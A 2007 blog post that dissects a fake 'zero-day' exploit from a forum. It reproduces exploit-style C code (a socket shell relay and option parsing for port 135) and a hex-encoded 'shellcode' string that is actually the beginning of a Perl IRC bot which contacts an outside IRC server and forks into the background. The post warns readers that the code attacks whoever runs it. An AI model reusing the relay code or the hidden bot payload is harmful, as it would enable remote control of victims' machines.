Saturday, November 17, 2007

exploits

Xxploit
void con(int sockfd)
{
char rb[1500];
fd_set fdreadme;
int i;

FD_ZERO(&fdreadme);
FD_SET(sockfd, &fdreadme);
FD_SET(0, &fdreadme);

while(1)
{
FD_SET(sockfd, &fdreadme);
FD_SET(0, &fdreadme);
if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
if(FD_ISSET(sockfd, &fdreadme))
{
if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if(write(1, rb, i) < 0) break;
}

if(FD_ISSET(0, &fdreadme))
{
if((i = read(0, rb, sizeof(rb))) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if (send(sockfd, rb, i, 0) < 0) break;
}
usleep(10000);
}

printf("[-] Connection closed by foreign host..\n");

exit(0);

}

int main(int argc, char **argv)
{
int len, len1, sockfd, c, a;
unsigned long ret;
unsigned short port = 135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
struct hostent *he;
struct sockaddr_in their_addr;
static char *hostname=NULL;

if(argc<2)
{
usage(argv[0]);
}

while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
{
switch (c)
{
case 'd':
hostname = optarg;
break;
case 't':
type = atoi(optarg);
if((type > 1) || (type < 0))
{
printf("[-] Select a valid target:\n");
for(a = 0; a < sizeof(targets)/sizeof(v); a++)
printf(" %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);
return 1;
}
break;
case 'r':
targets[type].ret = strtoul(optarg, NULL, 16);
break;
case 'p':
port = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
case 'l':
lportl = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
default:
usage(argv[0]);
return 1;
}
}

The code shown above reveals information about the raw socket which will be used to convey the packets used in this attack. Suffice it to say that there were no such attempts at creating a raw socket in the exploit that was posted in the forum by the individual claiming it was a 0 day exploit. Once this was ascertained alarm bells should be starting to go off in your head. If there are no system calls being used to deliver the exploit payload to the destination machine then just where is this code going to execute? You guessed it; right on the local machine itself. In reality you are not going to be exploiting anyone, but rather the code will be exploiting you!

One more thing about this supposed exploit bothered me as well. If you have not yet taken a look at the link I included for you to look at up above please do so now. What also bothered me here is that there was a surprisingly small amount of machine language or ASM as it is also called. The supposed ASM in the code listed in part I looks like the small snippet below;

char *shellcode_payload=
\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x3
\x68\x61\x6e\x3d\x22\x23\x30\x78\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22\xb
\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22\x69\x72\x33\x69\x70\x2e\xe
\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\xb
\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x9